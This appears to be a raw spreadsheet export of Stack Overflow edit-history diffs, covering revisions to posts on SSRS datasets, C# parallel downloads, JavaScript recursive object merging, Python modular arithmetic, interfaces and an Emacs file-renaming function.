 &lt;p&gt; I have a SSRS report and using &lt;span class="diff-add"&gt;PL/SQL&lt;/span&gt; for the dataset creation. My report needs two tables 1 one gives detailed view.(&lt;span class="diff-add"&gt;dataset 1&lt;/span&gt;) 2 one below that gives a summary table (data should come from the calculations based on the data in 1 table)&lt;/p&gt; _x000D_
 &lt;p&gt; I am using a temporary table for the &lt;span class="diff-add"&gt;dataset one&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; What are the methods to get calculated result for &lt;span class="diff-add"&gt;dataset 2&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; I wrote 2 procedures for each. since first table is a temporary one i am not getting result for second dataset.&lt;/p&gt; _x000D_
 &lt;p&gt; Why can be the options.&lt;/p&gt; _x000D_
 &lt;p&gt; Can I have multiple &lt;span class="diff-add"&gt;dataset&lt;/span&gt; out of single procedure?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Adriano Repetti</t>
  </si>
  <si>
    <t>Sébastien Sevrin</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'll add an example of how functional code can be used to &lt;em&gt;safely&lt;/em&gt; make code concurrent.&lt;/p&gt; _x000D_
 &lt;p&gt; Here is some code you might want to do in parallel, so you don't have wait for one file to finish to start downloading the next:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;void DownloadHTMLFiles(&lt;span class="diff-delete"&gt;IEnumerable&amp;lt;string&amp;gt;&lt;/span&gt; urls)_x000D_
{_x000D_
    foreach(string url in urls)_x000D_
    {_x000D_
         DownlaodOneFile(url);  //download html and save it to a file with a name based on the url - perhaps used for caching._x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; If you have a number of files the user might spend a minute or more waiting for them all. We can re-write this code functionally like this, and it basically does the exact same thing:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;urls.ForEach(DownloadOneFile);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note that this still runs sequentially. However, not only is it shorter, we've gained an important advantage here. Since each call to the DownloadOneFile function is completely isolated from the others (for our purposes, available bandwidth isn't an issue) you could very easily swap out the ForEach function for another very similar function: one that kicks off each call to DownlaodOneFile on a separate thread from a threadpool.&lt;/p&gt; _x000D_
 &lt;p&gt; It turns out .Net has just such a function availabe using &lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=348F73FD-593D-4B3C-B055-694C50D2B0F3" rel="nofollow noreferrer"&gt;Parallel Extensions&lt;/a&gt;. So, by using functional programming you can change one line of code and suddenly have something run in parallel that used to run sequentially. That's pretty powerful.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'll add an example of how functional code can be used to &lt;em&gt;safely&lt;/em&gt; make code concurrent.&lt;/p&gt; _x000D_
 &lt;p&gt; Here is some code you might want to do in parallel, so you don't have wait for one file to finish to start downloading the next:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;void DownloadHTMLFiles(&lt;span class="diff-add"&gt;List&amp;lt;string&amp;gt;&lt;/span&gt; urls)_x000D_
{_x000D_
    foreach(string url in urls)_x000D_
    {_x000D_
         DownlaodOneFile(url);  //download html and save it to a file with a name based on the url - perhaps used for caching._x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; If you have a number of files the user might spend a minute or more waiting for them all. We can re-write this code functionally like this, and it basically does the exact same thing:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;urls.ForEach(DownloadOneFile);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note that this still runs sequentially. However, not only is it shorter, we've gained an important advantage here. Since each call to the DownloadOneFile function is completely isolated from the others (for our purposes, available bandwidth isn't an issue) you could very easily swap out the ForEach function for another very similar function: one that kicks off each call to DownlaodOneFile on a separate thread from a threadpool.&lt;/p&gt; _x000D_
 &lt;p&gt; It turns out .Net has just such a function availabe using &lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=348F73FD-593D-4B3C-B055-694C50D2B0F3" rel="nofollow noreferrer"&gt;Parallel Extensions&lt;/a&gt;. So, by using functional programming you can change one line of code and suddenly have something run in parallel that used to run sequentially. That's pretty powerful.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I googled for code to merge object properties and ended up here. However since there wasn't any code for recursive merge I wrote it myself. (Maybe jQuery extend is recursive b.t.w.?) Anyhow, &lt;span class="diff-delete"&gt;hopefully&lt;/span&gt; someone else will find it useful as well.&lt;/p&gt; _x000D_
 &lt;p&gt;(Now the code does not use &lt;code&gt;&lt;span class="diff-delete"&gt;Object.prototype&lt;/span&gt;&lt;/code&gt;. :)&lt;span class="diff-delete"&gt; )&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;/&lt;span class="diff-delete"&gt;**&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;* Recursively merge properties of two objects _x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;*/_x000D_
function MergeRecursive(obj1, obj2) {_x000D_
  _x000D_
  for (var p in obj2) {_x000D_
    try {&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
      // Property in destination object set; update its value._x000D_
      if ( obj2[p].constructor==Object ) {_x000D_
        obj1[p] = MergeRecursive(obj1[p], obj2[p]);_x000D_
      } else {_x000D_
        obj1[p] = obj2[p];       _x000D_
      }_x000D_
      _x000D_
    } catch(e) {_x000D_
      // Property in destination object not set; create it and set its value._x000D_
      obj1[p] = obj2[p];&lt;span class="diff-delete"&gt;    &lt;/span&gt;      _x000D_
    }_x000D_
  }_x000D_
  _x000D_
  return obj1;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;o1 = {&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;  a: 1,_x000D_
  b: 2,_x000D_
  c: {_x000D_
    ca: 1,_x000D_
    cb: 2,_x000D_
    cc: {_x000D_
      cca: 100,_x000D_
      &lt;span class="diff-delete"&gt;ccb:&lt;/span&gt; &lt;span class="diff-delete"&gt;200_x000D_
&lt;/span&gt;    &lt;span class="diff-delete"&gt;}_x000D_
&lt;/span&gt;  }&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;};_x000D_
_x000D_
o2 = {&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;  a: 10,_x000D_
  c: {_x000D_
    ca: 10,_x000D_
    cb: 20,_x000D_
    cc: {_x000D_
      cca: 101,_x000D_
      &lt;span class="diff-delete"&gt;ccb:&lt;/span&gt; &lt;span class="diff-delete"&gt;202_x000D_
&lt;/span&gt;    &lt;span class="diff-delete"&gt;}_x000D_
&lt;/span&gt;  }&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;};_x000D_
_x000D_
o3 = MergeRecursive(o1, o2);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;o3 = {&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;  a: 10,_x000D_
  b: 2,_x000D_
  c: {_x000D_
    ca: 10,_x000D_
    cb: 20,_x000D_
    cc: {_x000D_
      cca: 101,_x000D_
      &lt;span class="diff-delete"&gt;ccb:&lt;/span&gt; &lt;span class="diff-delete"&gt;202_x000D_
&lt;/span&gt;    &lt;span class="diff-delete"&gt;}_x000D_
&lt;/span&gt;  }&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;};_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I googled for code to merge object properties and ended up here. However since there wasn't any code for recursive merge I wrote it myself. (Maybe jQuery extend is recursive b.t.w.?) Anyhow, &lt;span class="diff-add"&gt;Hopefully&lt;/span&gt; someone else will find it useful as well.&lt;/p&gt; _x000D_
 &lt;p&gt;(Now the code does not use &lt;span class="diff-add"&gt;Object&lt;/span&gt;.&lt;span class="diff-add"&gt;prototype&lt;/span&gt; :)&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;/&lt;span class="diff-add"&gt;*&lt;/span&gt;_x000D_
* Recursively merge properties of two objects _x000D_
*/_x000D_
function MergeRecursive(obj1, obj2) {_x000D_
  _x000D_
  for (var p in obj2) {_x000D_
    try {_x000D_
      // Property in destination object set; update its value._x000D_
      if ( obj2[p].constructor==Object ) {_x000D_
        obj1[p] = MergeRecursive(obj1[p], obj2[p]);&lt;span class="diff-add"&gt;_x000D_
        &lt;/span&gt;_x000D_
      } else {_x000D_
        obj1[p] = obj2[p];&lt;span class="diff-add"&gt;_x000D_
 &lt;/span&gt;       _x000D_
      }_x000D_
      _x000D_
    } catch(e) {_x000D_
      // Property in destination object not set; create it and set its value._x000D_
      obj1[p] = obj2[p];&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;      _x000D_
    }_x000D_
  }_x000D_
  _x000D_
  return obj1;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;o1 = {  a&lt;span class="diff-add"&gt; &lt;/span&gt;: 1,_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;  b&lt;span class="diff-add"&gt; &lt;/span&gt;: 2,_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;  c&lt;span class="diff-add"&gt; &lt;/span&gt;: {_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;    ca&lt;span class="diff-add"&gt; &lt;/span&gt;: 1,_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;    cb&lt;span class="diff-add"&gt; &lt;/span&gt;: 2,_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;    cc&lt;span class="diff-add"&gt; &lt;/span&gt;: {_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;      cca&lt;span class="diff-add"&gt; &lt;/span&gt;: 100,_x000D_
           &lt;span class="diff-add"&gt; ccb&lt;/span&gt; &lt;span class="diff-add"&gt;:&lt;/span&gt; &lt;span class="diff-add"&gt;200 &lt;/span&gt;}&lt;span class="diff-add"&gt; } &lt;/span&gt;};_x000D_
&lt;span class="diff-add"&gt;            &lt;/span&gt;_x000D_
o2 = {  a&lt;span class="diff-add"&gt; &lt;/span&gt;: 10,_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;  c&lt;span class="diff-add"&gt; &lt;/span&gt;: {_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;    ca&lt;span class="diff-add"&gt; &lt;/span&gt;: 10,_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;    cb&lt;span class="diff-add"&gt; &lt;/span&gt;: 20,&lt;span class="diff-add"&gt; &lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;    cc&lt;span class="diff-add"&gt; &lt;/span&gt;: {_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;      cca&lt;span class="diff-add"&gt; &lt;/span&gt;: 101,_x000D_
            &lt;span class="diff-add"&gt;ccb&lt;/span&gt; &lt;span class="diff-add"&gt;: 202 &lt;/span&gt;}&lt;span class="diff-add"&gt; } &lt;/span&gt;};_x000D_
_x000D_
o3 = MergeRecursive(o1, o2);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;o3 = {  a&lt;span class="diff-add"&gt; &lt;/span&gt;: 10,_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;  b&lt;span class="diff-add"&gt; &lt;/span&gt;: 2,_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;  c&lt;span class="diff-add"&gt; &lt;/span&gt;: {_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;    ca&lt;span class="diff-add"&gt; &lt;/span&gt;: 10,_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;    cb&lt;span class="diff-add"&gt; &lt;/span&gt;: 20,_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;    cc&lt;span class="diff-add"&gt; &lt;/span&gt;: {&lt;span class="diff-add"&gt; &lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;      &lt;/span&gt;      cca&lt;span class="diff-add"&gt; &lt;/span&gt;: 101,_x000D_
            &lt;span class="diff-add"&gt;ccb :&lt;/span&gt; &lt;span class="diff-add"&gt;202 &lt;/span&gt;}&lt;span class="diff-add"&gt; } &lt;/span&gt;};_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Sk8erPeter</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; _x000D_
  &lt;strike&gt; _x000D_
   &lt;span class="diff-delete"&gt;I found an article at "Pete W.'s Idea Book" blog that was invaluable to setting up TeamCity and Visual SVN for me. &lt;/span&gt; _x000D_
   &lt;a href="http://www.acceptedeclectic.com/2008/05/visualsvn-teamcity-nant-sql-server.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;VisualSVN + TeamCity + NAnt + SQL Server&lt;/span&gt;&lt;/a&gt; _x000D_
  &lt;/strike&gt;&lt;/p&gt; _x000D_
 &lt;strike&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-delete"&gt; Even talks about getting SQL Server 2005 working with TeamCity (although, I believe it works out of the box with TeamCity 4.x). Integration with NAnt helped, too.&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/strike&gt; _x000D_
 &lt;p&gt; _x000D_
  &lt;strike&gt; _x000D_
   &lt;span class="diff-delete"&gt; This is a good introduction and tutorial article.&lt;/span&gt; _x000D_
  &lt;/strike&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Edit: domain expired&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I found an article at "Pete W.'s Idea Book" blog that was invaluable to setting up TeamCity and Visual SVN for me. &lt;/span&gt;&lt;a href="http://www.acceptedeclectic.com/2008/05/visualsvn-teamcity-nant-sql-server.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;VisualSVN + TeamCity + NAnt + SQL Server&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Even talks about getting SQL Server 2005 working with TeamCity (although, I believe it works out of the box with TeamCity 4.x). Integration with NAnt helped, too.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; This is a good introduction and tutorial article&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Phill</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Well, I have this bit of code that is slowing down the program hugely because it is linear complexity but called a lot of times making the program quadratic complexity. If possible I would like to reduce its computational complexity but otherwise I'll just optimize it where I can. So far I have reduced down to:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def table(n):_x000D_
    a = 1_x000D_
    while 2*a &amp;lt;= n:_x000D_
      if (-a*a)%n == 1: return a_x000D_
      _x000D_
      a += 1_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Anyone see anything I've missed? Thanks!&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT: I forgot to mention: n is always a prime number.&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT 2: Here is my new improved program (thank's for all the contributions!):&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def table(n):_x000D_
    if n == 2: return 1_x000D_
    if n%4 != 1: return_x000D_
    _x000D_
    a1 = n-1_x000D_
    for a in range(1, n/&lt;span class="diff-delete"&gt;2 + 1&lt;/span&gt;):_x000D_
        if (a*a)%n == a1: return a_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; EDIT 3: And testing it out in its real context it is &lt;em&gt;much&lt;/em&gt; faster! Well this question appears solved but there are many useful answers. I should also say that as well as those above optimizations, I have memoized the function using Python dictionaries...&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Well, I have this bit of code that is slowing down the program hugely because it is linear complexity but called a lot of times making the program quadratic complexity. If possible I would like to reduce its computational complexity but otherwise I'll just optimize it where I can. So far I have reduced down to:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def table(n):_x000D_
    a = 1_x000D_
    while 2*a &amp;lt;= n:_x000D_
      if (-a*a)%n == 1: return a_x000D_
      _x000D_
      a += 1_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Anyone see anything I've missed? Thanks!&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT: I forgot to mention: n is always a prime number.&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT 2: Here is my new improved program (thank's for all the contributions!):&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def table(n):_x000D_
    if n == 2: return 1_x000D_
    if n%4 != 1: return_x000D_
    _x000D_
    a1 = n-1_x000D_
    for a in range(1, n/&lt;span class="diff-add"&gt;/2+1&lt;/span&gt;):_x000D_
        if (a*a)%n == a1: return a_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; EDIT 3: And testing it out in its real context it is &lt;em&gt;much&lt;/em&gt; faster! Well this question appears solved but there are many useful answers. I should also say that as well as those above optimizations, I have memoized the function using Python dictionaries...&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>PythonPower</t>
  </si>
  <si>
    <t>Dan Vinton</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have seen this mentioned a few times and I am not totally clear on what it means. When and why would you do this?&lt;span class="diff-delete"&gt; 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lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I know what interfaces do, but the fact I am not clear on this makes me think I am missing out on using them correctly.&lt;/p&gt; _x000D_
 &lt;p&gt; Is it just so if you were to do:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;IInterface classRef = new ObjectWhatever()_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; You could use any class that implements &lt;code&gt;IInterface&lt;/code&gt;? When would you need to do that? The only thing I can think of is if you have a method and you are unsure of what object will be passed expect for it implementing &lt;code&gt;IInterface&lt;/code&gt;. I cannot think how often you would need to do that... (Also, how could you write a method that takes in a object that implements an interface? Is that possible?)&lt;/p&gt; _x000D_
 &lt;p&gt; Sorry if I completely missed the point.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have seen this mentioned a few times and I am not totally clear on what it means. When and why would you do this?&lt;/p&gt; _x000D_
 &lt;p&gt; I know what interfaces do, but the fact I am not clear on this makes me think I am missing out on using them correctly.&lt;/p&gt; _x000D_
 &lt;p&gt; Is it just so if you were to do:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;IInterface classRef = new ObjectWhatever()_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; You could use any class that implements &lt;code&gt;IInterface&lt;/code&gt;? When would you need to do that? The only thing I can think of is if you have a method and you are unsure of what object will be passed expect for it implementing &lt;code&gt;IInterface&lt;/code&gt;. I cannot think how often you would need to do that... (Also, how could you write a method that takes in a object that implements an interface? Is that possible?)&lt;/p&gt; _x000D_
 &lt;p&gt; Sorry if I completely missed the point.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a built in way to limit the depth of a &lt;code&gt;&lt;span class="diff-delete"&gt;System.Collection.Generics.Stack&lt;/span&gt;&lt;/code&gt;? So that if you are at max capacity, pushing a new element would remove the bottom of the stack?&lt;/p&gt; _x000D_
 &lt;p&gt; I know I can do it by converting to an array and rebuilding the stack, but I figured there's probably a method on it already.&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT: I wrote an extension method:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;    public static void Trim&amp;lt;T&amp;gt; (this Stack&amp;lt;T&amp;gt; stack, int trimCount) _x000D_
    {_x000D_
        if (stack.Count &amp;lt;= trimCount)_x000D_
            return;_x000D_
_x000D_
       stack = new _x000D_
            Stack&amp;lt;T&amp;gt;_x000D_
            (_x000D_
                stack_x000D_
                    .ToArray()_x000D_
                    .Take(trimCount)_x000D_
            );           _x000D_
    }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; So, it returns a new stack upon trimming, but isn't immutability the functional way&lt;span class="diff-delete"&gt;?&lt;/span&gt; =)&lt;/p&gt; _x000D_
 &lt;p&gt; The reason for this is that I'm storing undo steps for an app in a stack, and I only want to store a finite amount of steps.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a built in way to limit the depth of a &lt;span class="diff-add"&gt;System.Collection.Generics.Stack&lt;/span&gt;? So that if you are at max capacity, pushing a new element would remove the bottom of the stack?&lt;/p&gt; _x000D_
 &lt;p&gt; I know I can do it by converting to an array and rebuilding the stack, but I figured there's probably a method on it already.&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT: I wrote an extension method:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;    public static void Trim&amp;lt;T&amp;gt; (this Stack&amp;lt;T&amp;gt; stack, int trimCount) _x000D_
    {_x000D_
        if (stack.Count &amp;lt;= trimCount)_x000D_
            return;_x000D_
_x000D_
       stack = new _x000D_
            Stack&amp;lt;T&amp;gt;_x000D_
            (_x000D_
                stack_x000D_
                    .ToArray()_x000D_
                    .Take(trimCount)_x000D_
            );           _x000D_
    }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; So, it returns a new stack upon trimming, but isn't immutability the functional way =)&lt;/p&gt; _x000D_
 &lt;p&gt; The reason for this is that I'm storing undo steps for an app in a stack, and I only want to store a finite amount of steps.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Try this function from &lt;a href="http://steve.yegge.googlepages.com/my-dot-emacs-file" rel="nofollow noreferrer"&gt;Steve Yegge's .emacs&lt;/a&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;;; source: http://steve.yegge.googlepages.com/my-dot-emacs-file_x000D_
(defun rename-file-and-buffer (new-name)_x000D_
  "Renames both current buffer and file it's visiting to NEW-NAME."_x000D_
  (interactive "sNew name: ")_x000D_
  (let ((name (buffer-name))_x000D_
        (filename (buffer-file-name)))_x000D_
    (if (not filename)_x000D_
        (message "Buffer '%s' is not visiting a file!" name)_x000D_
      (if (get-buffer new-name)_x000D_
          (message "A buffer named '%s' already exists!" new-name)_x000D_
        (progn_x000D_
          (rename-file name new-name 1)_x000D_
          (rename-buffer new-name)_x000D_
          (set-visited-file-name new-name)_x000D_
          (set-buffer-modified-p nil))))))_x000D_
&lt;/pre&gt; _x000D_
 &lt;p&gt; Take a look at that page, there's another really useful related function there, called "move-buffer-file".&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; And once you have done the above, you can add a key binding too. For me, &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;C-x C-r&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; was empty and seemed pretty intuitive too. Here's the code to do it:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;(global-set-key (kbd "C-x C-r") 'rename-file-and-buffer)_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Try this function from &lt;a href="http://steve.yegge.googlepages.com/my-dot-emacs-file" rel="nofollow noreferrer"&gt;Steve Yegge's .emacs&lt;/a&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;;; source: http://steve.yegge.googlepages.com/my-dot-emacs-file_x000D_
(defun rename-file-and-buffer (new-name)_x000D_
  "Renames both current buffer and file it's visiting to NEW-NAME."_x000D_
  (interactive "sNew name: ")_x000D_
  (let ((name (buffer-name))_x000D_
        (filename (buffer-file-name)))_x000D_
    (if (not filename)_x000D_
        (message "Buffer '%s' is not visiting a file!" name)_x000D_
      (if (get-buffer new-name)_x000D_
          (message "A buffer named '%s' already exists!" new-name)_x000D_
        (progn_x000D_
          (rename-file name new-name 1)_x000D_
          (rename-buffer new-name)_x000D_
          (set-visited-file-name new-name)_x000D_
          (set-buffer-modified-p nil))))))_x000D_
&lt;/pre&gt; _x000D_
 &lt;p&gt; Take a look at that page, there's another really useful related function there, called "move-buffer-file".&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Indradhanush Gupta</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Jeff Atwood is&lt;/span&gt; a &lt;span class="diff-delete"&gt;douche&lt;/span&gt; and &lt;span class="diff-delete"&gt;SO is full of assholes&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Not to long ago, someone told me that &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;long&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; are not 64 bits on 64 bit machines and I should always use &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;int&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt;. This did not make sense to me. I have seen docs (such as the one on Apple's official site) say that &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;long&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; are indeed 64 bits when compiling for&lt;/span&gt; a &lt;span class="diff-add"&gt;64-bit CPU. I looked up what it was on 64-bit Windows&lt;/span&gt; and &lt;span class="diff-add"&gt;found&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;ul&gt; _x000D_
   &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
   &lt;li&gt;&lt;span class="diff-add"&gt; Windows: &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;long&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; and &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;int&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; remain 32-bit in length, and special new data types are defined for 64-bit integers.&lt;/span&gt;&lt;/li&gt; _x000D_
   &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;/ul&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
